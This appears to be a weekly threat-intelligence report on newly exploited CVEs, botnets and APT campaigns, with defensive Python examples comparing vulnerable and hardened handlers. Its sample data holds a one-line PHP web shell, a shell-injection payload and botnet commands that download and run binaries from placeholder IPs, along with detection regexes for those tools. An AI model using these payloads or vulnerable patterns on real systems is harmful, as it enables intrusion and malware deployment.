Executive Summary
The week saw critical developments across the threat landscape, including new additions to the CISA Known Exploited Vulnerabilities (KEV) catalog and continued targeting of enterprise infrastructure by advanced threat actors.
CISA added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog this week: two critical injection flaws in Cisco ISE and ISE-PIC, and a cross-site request forgery flaw in PaperCut NG/MF, a print-management product widely used in schools and businesses, included because it can lead to unauthorized code execution. Separately, active exploitation was observed against the Alone - Charity Multipurpose WordPress theme, where unauthenticated attackers used an arbitrary file upload flaw to gain remote code execution on affected sites.
Botnet activity intensified as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st ran widespread campaigns exploiting vulnerabilities in GitLab, Cloud Gateway, and PHP-based applications. IoT botnets such as Mirai, Bashlite, Tsunami, and BrickerBot mass-exploited exposed Eir D1000 routers, giving attackers a foothold for lateral movement into the networks behind them.
This week also brought attention to advanced threat activity: Darktrace reported that threat actors exploited a critical flaw in SAP NetWeaver (CVE-2025-31324) to deploy the Auto-Color backdoor in an attack against a U.S. chemical firm. Meanwhile, Microsoft attributed ongoing exploitation of on-premises SharePoint Server vulnerabilities to three China-based actors: Linen Typhoon (APT27), Violet Typhoon (APT31), and Storm-2603, the last of which has been linked to Warlock ransomware deployment.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
CVE-2025-5394
An arbitrary file upload vulnerability in the Alone - Charity Multipurpose Non-Profit WordPress theme allows unauthenticated attackers to upload malicious files and achieve remote code execution on affected WordPress sites. Rated critical with a CVSS score of 9.8, the flaw affects versions up to and including 7.8.3 and is patched in version 7.8.5. Although Wordfence publicly disclosed the issue on July 14, 2025, exploitation had already begun two days earlier, on July 12, underscoring how threat actors monitor code changes in patches for emerging vulnerabilities. Wordfence reports that its firewall has blocked over 120,900 exploitation attempts, and a public proof-of-concept (PoC) is now available, further fueling in-the-wild exploitation. Immediate patching and monitoring are strongly advised; site owners should also check the theme and uploads directories for unexpected PHP files, since a successful upload will have left the attacker's payload on disk.
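The mechanics behind an arbitrary file upload flaw, and the checks that close it, as an added illustration in Python rather than the theme's own PHP code: a vulnerable handler that writes the client-supplied filename straight into the upload directory, beside a hardened one that allow-lists extensions, verifies magic bytes, discards the client-supplied path, and stores the file under a server-generated name. The sample filenames and bytes are constructed, and the allowed-type table is an assumption, not anything from the advisory.

```python
import os
import secrets
import tempfile
from pathlib import Path

# Assumed allow-list: extension -> magic bytes the content must begin with.
# Anything not listed (php, phtml, htaccess, ...) is refused outright.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def unsafe_store(filename: str, data: bytes, upload_dir: str) -> str:
    """Vulnerable pattern: the client-supplied name (and so the extension and
    any path components) is written to disk unchanged. A request naming
    'shell.php' lands a web shell inside the web root."""
    dest = os.path.join(upload_dir, filename)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def safe_store(filename: str, data: bytes, upload_dir: str) -> str:
    """Hardened pattern: validate size, extension and content, then store under
    a server-generated name so nothing client-controlled reaches the filesystem."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file exceeds size limit")
    if "\x00" in filename:
        raise UploadRejected("NUL byte in filename")
    # Keep only the final path component; this neutralises '../' traversal and
    # absolute paths whichever separator the client used.
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base or base.startswith("."):
        raise UploadRejected("missing or hidden extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} is not allowed")
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    # Random server-chosen name; double extensions such as 'x.php.png' are moot
    # because only the validated trailing extension survives.
    dest = Path(upload_dir).resolve() / f"{secrets.token_hex(16)}.{ext}"
    # O_EXCL refuses to overwrite an existing file; mode 0o640 drops the execute
    # bit (the directory should also have script execution disabled in the web
    # server configuration, which Python cannot show here).
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return str(dest)


# Constructed sample uploads, not real traffic.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SHELL = b"<?php system($_GET['c']); ?>"
SAMPLES = [
    ("avatar.png", PNG_HEADER),            # legitimate image
    ("shell.php", PHP_SHELL),              # classic web shell
    ("cover.php.png", PHP_SHELL),          # double extension, PHP body
    ("../../wp-config.png", PNG_HEADER),   # traversal in the name
    ("LOGO.PNG", PNG_HEADER),              # upper-case extension
]


def run_samples() -> dict:
    """Return {filename: 'stored' | 'rejected: <reason>'} for each sample."""
    upload_dir = tempfile.mkdtemp(prefix="uploads-")
    outcome = {}
    for name, body in SAMPLES:
        try:
            path = safe_store(name, body, upload_dir)
            if os.path.dirname(path) != str(Path(upload_dir).resolve()):
                raise RuntimeError("stored file escaped the upload directory")
            outcome[name] = "stored"
        except UploadRejected as exc:
            outcome[name] = f"rejected: {exc}"
    return outcome


def unsafe_demo() -> str:
    """Show what the vulnerable handler does with the same web shell."""
    upload_dir = tempfile.mkdtemp(prefix="uploads-unsafe-")
    return os.path.basename(unsafe_store("shell.php", PHP_SHELL, upload_dir))


if __name__ == "__main__":
    for name, result in run_samples().items():
        print(f"{name:24} {result}")
    print("vulnerable handler wrote:", unsafe_demo())
```

The traversal sample is accepted, which is the point: once the name is reduced to its basename and replaced by a random one, the attacker's path is irrelevant and the only thing that decides acceptance is whether the bytes are really a PNG.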
CVE-2025-20281
An injection vulnerability in Cisco Identity Services Engine (ISE) and ISE-PIC stems from inadequate validation of user-supplied input in a specific API endpoint. Rated critical with a CVSS score of 10.0, the flaw allows an unauthenticated remote attacker to submit specially crafted API requests and execute arbitrary code with root privileges on the underlying operating system. It affects Cisco ISE versions 3.3 and 3.4, exposing enterprise environments to severe risk if left unpatched; because ISE sits at the centre of network access control, compromise of the appliance also exposes the credentials and access policies it manages. Cisco has released fixed versions, and CISA has added the vulnerability to its KEV catalog, confirming exploitation in the wild and the urgency of remediation.
CVE-2025-20337
A second, separately tracked injection vulnerability in the same Cisco ISE and ISE-PIC API, with the same root cause: inadequate validation of user-supplied input. It is likewise rated critical with a CVSS score of 10.0 and allows an unauthenticated remote attacker to execute arbitrary code as root through specially crafted API requests on Cisco ISE versions 3.3 and 3.4. Cisco has released fixed versions, and CISA has added this CVE to its KEV catalog alongside CVE-2025-20281. Because the two issues are tracked and fixed separately, administrators should verify that the installed patch level addresses both CVEs rather than assuming one fix covers the other.
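How "inadequate validation of user-supplied input" in an API endpoint turns into code execution, as an added example that is a generic command-injection pattern and not Cisco's code: the vulnerable handler splices a request parameter into a shell command string, while the hardened one validates the value against an allow-list grammar and then passes it as a discrete argv element with no shell involved. `echo` stands in for whatever utility the real endpoint wraps, and the hostname grammar and attacker payload are constructed. The other half of the fix the advisory implies is privilege: an API worker running as an unprivileged user turns any remaining bypass into a limited shell rather than root on the appliance.

```python
import ipaddress
import re
import subprocess

# Assumed allow-list grammar for the parameter: RFC 1123 hostname labels.
# Anything outside it is refused before any command is built.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def is_valid_target(target: str) -> bool:
    """True for an IPv4/IPv6 literal or a well-formed hostname, else False."""
    if not target or len(target) > 253:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(target.lower()) is not None


def vulnerable_echo_target(target: str) -> str:
    """Vulnerable pattern: the request parameter is spliced into a shell command
    string. 'echo' stands in for whatever utility the real endpoint wraps; it is
    the shell, not the utility, that interprets ';', '|', '$()' and friends."""
    result = subprocess.run(f"echo {target}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def argv_only_echo_target(target: str) -> str:
    """Argv isolation alone: with shell=False the parameter is a single argv
    element, so metacharacters are inert and come back as literal text."""
    result = subprocess.run(["echo", target], capture_output=True, text=True)
    return result.stdout


def hardened_echo_target(target: str) -> str:
    """Hardened pattern: allow-list validation first, argv isolation second.
    Validation rejects junk early; argv isolation means a validation bug still
    cannot hand the attacker a shell."""
    if not is_valid_target(target):
        raise ValueError(f"invalid target: {target!r}")
    result = subprocess.run(["echo", target], shell=False,
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    payload = "192.0.2.10; echo INJECTED"   # constructed attacker input
    print("vulnerable :", repr(vulnerable_echo_target(payload)))
    print("argv only  :", repr(argv_only_echo_target(payload)))
    try:
        hardened_echo_target(payload)
    except ValueError as exc:
        print("hardened   :", exc)
    print("hardened   :", repr(hardened_echo_target("ise.example.internal")))
```

The vulnerable call prints two lines because `sh -c` ran two commands; the argv-only call prints the payload back as one literal string; the hardened call never reaches `subprocess` at all for that input.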
CVE-2023-2533
A cross-site request forgery (CSRF) vulnerability in PaperCut NG/MF, print-management software widely used by schools, businesses, and government agencies, can under specific conditions allow an attacker to alter security settings or execute arbitrary code. Rated high with a CVSS score of 8.8, it affects version 22.0.10 (Build 65996, released 2023-03-27) and was patched in June 2023. Exploitation requires a logged-in administrator to load attacker-controlled content, such as a crafted link or page, while the admin session is active; because the admin interface typically runs on internal web servers that an external attacker cannot reach directly, CSRF is the route by which that authenticated session can be ridden to manipulate security settings or gain a foothold into the broader network. The vulnerability has now been added to the CISA KEV catalog, emphasizing the need to apply the patch and reinforce CSRF protections (per-session anti-forgery tokens, origin checks, and SameSite cookie attributes) immediately.
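What "leveraging an authenticated admin session" means in practice, and what the recommended CSRF protections look like in code, as an added example that is not PaperCut's implementation: a vulnerable settings handler that honours any POST carrying a valid session cookie, beside a hardened one that checks Origin/Referer and a per-session synchronizer token in constant time. The origin, setting name, session store and request objects are constructed stand-ins.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed deployment values; the real origin depends on the installation.
ALLOWED_ORIGINS = {"https://print.example.internal:9192"}
SESSIONS: dict = {}                               # session id -> {"user", "csrf"}
SETTINGS = {"allow_script_execution": False}      # hypothetical admin setting


@dataclass
class Request:
    method: str
    headers: dict = field(default_factory=dict)   # Origin, Referer, ...
    cookies: dict = field(default_factory=dict)   # attached automatically by the browser
    form: dict = field(default_factory=dict)      # POST body fields


def login(user: str) -> tuple[str, str]:
    """Create a session plus a CSRF token bound to it. The token is embedded in
    the app's own pages as a hidden form field, never stored in a cookie."""
    sid, token = secrets.token_urlsafe(32), secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": token}
    return sid, token


def _session(req: Request):
    return SESSIONS.get(req.cookies.get("session", ""))


def vulnerable_update_setting(req: Request) -> int:
    """Vulnerable: any POST with a valid session cookie is honoured. The browser
    attaches that cookie to a form auto-submitted from attacker.example just as
    readily as to one from the admin console."""
    if req.method != "POST" or _session(req) is None:
        return 401
    SETTINGS["allow_script_execution"] = req.form.get("allow_script_execution") == "on"
    return 200


def _origin_allowed(req: Request) -> bool:
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if not origin:
        return False   # fail closed: a state change with no Origin/Referer is suspicious
    return any(origin == o or origin.startswith(o + "/") for o in ALLOWED_ORIGINS)


def hardened_update_setting(req: Request) -> int:
    """Hardened: require (1) an Origin/Referer belonging to the app and (2) the
    session's synchronizer token in the body, compared in constant time. Setting
    the session cookie SameSite=Lax (cookies are a plain dict here, so not shown)
    adds a browser-enforced third layer."""
    sess = _session(req)
    if req.method != "POST" or sess is None:
        return 401
    if not _origin_allowed(req):
        return 403
    if not hmac.compare_digest(req.form.get("csrf_token", ""), sess["csrf"]):
        return 403
    SETTINGS["allow_script_execution"] = req.form.get("allow_script_execution") == "on"
    return 200


def run_scenario() -> dict:
    """Replay forged, legitimate and cross-session requests against both
    handlers; return {case: (status, resulting setting value)}."""
    sid, token = login("admin")
    app_origin = {"Origin": "https://print.example.internal:9192"}
    forged = Request("POST", headers={"Origin": "https://attacker.example"},
                     cookies={"session": sid},
                     form={"allow_script_execution": "on"})          # no token
    legit = Request("POST", headers=app_origin, cookies={"session": sid},
                    form={"allow_script_execution": "on", "csrf_token": token})
    other_sid, _ = login("other-admin")
    cross = Request("POST", headers=app_origin, cookies={"session": other_sid},
                    form={"allow_script_execution": "on", "csrf_token": token})
    out = {}
    for name, handler, req in [("vulnerable_forged", vulnerable_update_setting, forged),
                               ("hardened_forged", hardened_update_setting, forged),
                               ("hardened_legit", hardened_update_setting, legit),
                               ("hardened_cross_session", hardened_update_setting, cross)]:
        SETTINGS["allow_script_execution"] = False
        out[name] = (handler(req), SETTINGS["allow_script_execution"])
    return out


if __name__ == "__main__":
    for case, result in run_scenario().items():
        print(f"{case:24} status={result[0]} setting={result[1]}")
```

The forged request succeeds against the vulnerable handler purely because the browser supplied the admin's cookie; the hardened handler refuses it on origin alone, and a token lifted from one session is rejected in another because the comparison is against the token bound to the cookie that was actually sent.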
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insight into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs are those whose payloads are suggestive of botnet activity, such as invoking wget to fetch a binary from a raw IP address.
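The heuristic this section describes, flagging payloads that point wget or a similar downloader at a raw IP address and ranking CVEs by such hits, as an added example that is not Loginsoft's sensor code: the indicator set, decoding logic and sensor records are constructed, and the CVE labels on the records reuse identifiers from this report purely as sample data.

```python
import re
from collections import Counter
from urllib.parse import unquote

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"

# Indicator name -> regex applied to the decoded payload. The first is the
# hallmark named above: a downloader aimed at a bare IPv4 address rather than a
# hostname. The rest are staging steps commonly seen around it.
INDICATORS = {
    "downloader_to_ip": re.compile(rf"\b(?:wget|curl|tftp|ftpget)\b[^;|&\n]*?{IPV4}", re.I),
    "raw_ipv4_url": re.compile(rf"https?://{IPV4}", re.I),
    "world_writable_dir": re.compile(r"/(?:tmp|var/tmp|dev/shm)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    "busybox": re.compile(r"\bbusybox\b", re.I),
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
    "rm_rf": re.compile(r"\brm\s+-rf\b"),
}


def decode_payload(raw: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times: exploit kits often encode the command
    once and the delivery framework encodes it again. unquote (not unquote_plus)
    is used so a literal '+' as in 'chmod +x' survives."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def classify(raw_payload: str) -> dict:
    """Return the decoded payload, the indicators it matched, and a verdict. A
    downloader pointed at a raw IP is decisive on its own; otherwise two
    corroborating indicators are required, so a lone '/tmp' or 'base64 -d'
    does not trip the heuristic."""
    payload = decode_payload(raw_payload)
    hits = [name for name, rx in INDICATORS.items() if rx.search(payload)]
    verdict = "downloader_to_ip" in hits or len(hits) >= 2
    return {"decoded": payload, "indicators": hits, "botnet_like": verdict}


def top_botnet_cves(records, n: int = 5) -> list:
    """Rank CVEs by the number of botnet-like payloads attributed to them."""
    counts = Counter(r["cve"] for r in records if classify(r["payload"])["botnet_like"])
    return counts.most_common(n)


# Constructed sensor records; the CVE labels reuse identifiers from this report
# as sample data only and do not reflect real sensor attribution.
SENSOR_RECORDS = [
    {"cve": "CVE-2025-5394", "src": "198.51.100.7",
     "payload": "cd%20%2Ftmp%3Bwget%20http%3A%2F%2F192.0.2.10%2Fbins%2Fx86%3Bchmod%20%2Bx%20x86%3B.%2Fx86"},
    {"cve": "CVE-2025-5394", "src": "198.51.100.8",
     "payload": "cd /tmp; curl -O http://192.0.2.10/bins/arm7; chmod 777 arm7; ./arm7 wp"},
    {"cve": "CVE-2025-20281", "src": "203.0.113.4",
     "payload": "cd /tmp || cd /var/run; /bin/busybox tftp -g -r bot.mips 192.0.2.22"},
    {"cve": "CVE-2023-2533", "src": "203.0.113.9",
     "payload": "username=admin&password=admin"},
    {"cve": "CVE-2025-31324", "src": "198.51.100.12",
     "payload": "echo%20aGVsbG8%3D%20%7C%20base64%20-d"},
]


if __name__ == "__main__":
    for rec in SENSOR_RECORDS:
        res = classify(rec["payload"])
        print(f"{rec['cve']:15} botnet_like={res['botnet_like']!s:5} {res['indicators']}")
    print("top CVEs:", top_botnet_cves(SENSOR_RECORDS))
```

The `tftp -g -r ... 192.0.2.22` record is why the downloader pattern tolerates arbitrary text between the tool and the address: busybox tftp takes the host as a trailing positional argument, not inside a URL.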
Vulnerabilities Abused by Malware
We proactively monitor vulnerabilities targeted by adversaries. Each vulnerability is manually reviewed and mapped to MITRE ATT&CK tactics and techniques. The information comes from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
CVE-2025-31324
According to Darktrace, threat actors exploited a now-patched critical vulnerability in SAP NetWeaver, CVE-2025-31324, to deploy the Auto-Color backdoor in an attack on a U.S.-based chemicals company in April 2025. The attackers had access to the victim's network over a span of three days, attempted to download suspicious files, and communicated with infrastructure tied to the Auto-Color malware. Auto-Color, a backdoor targeting Linux systems, was first documented by Palo Alto Networks in February 2025; it had been used in campaigns against universities and government agencies across North America and Asia between November and December 2024. The malware takes its name from its habit of renaming itself to /var/log/cross/auto-color after execution to blend in with legitimate system files and maintain persistence. Defenders running internet-facing SAP NetWeaver should confirm the CVE-2025-31324 fix is applied and hunt for that path, as well as for outbound connections from the SAP host to unfamiliar infrastructure.
Microsoft Links SharePoint Exploits to Chinese APTs
Microsoft has formally attributed ongoing exploitation of vulnerabilities in internet-facing, on-premises SharePoint Server instances to three China-based threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The activity, observed as early as July 7, 2025, corroborates earlier threat intelligence findings. Linen Typhoon (also known as APT27 or Emissary Panda) is a long-standing espionage group known for tools such as SysUpdate and PlugX. Violet Typhoon (aka APT31) has operated since 2015 and has previously targeted the United States, Finland, and Czechia in cyber espionage operations. Storm-2603 has been linked to the deployment of Warlock ransomware and has previously been associated with the LockBit ransomware ecosystem as well. Microsoft cautions that the growing use of these exploits means attackers will likely continue to target unpatched SharePoint systems. Organizations are urged to apply the latest SharePoint security updates, enable the Antimalware Scan Interface (AMSI) in Full Mode, and deploy endpoint protection such as Microsoft Defender Antivirus across all on-premises SharePoint servers; where compromise is suspected, Microsoft also recommends rotating the ASP.NET machine keys, since keys stolen before patching let an attacker keep forging valid requests afterwards.
PRE-NVD observed for this week
This refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database (NVD). The LOVI platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/07/28/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://securityonline.info/critical-rce-flaw-cve-2025-5394-in-alone-wordpress-theme-actively-exploited-allowing-full-site-takeover/
- https://www.wordfence.com/blog/2025/07/attackers-actively-exploiting-critical-vulnerability-in-alone-theme/
- https://www.darktrace.com/blog/auto-color-backdoor-how-darktrace-thwarted-a-stealthy-linux-intrusion
- https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/
- https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/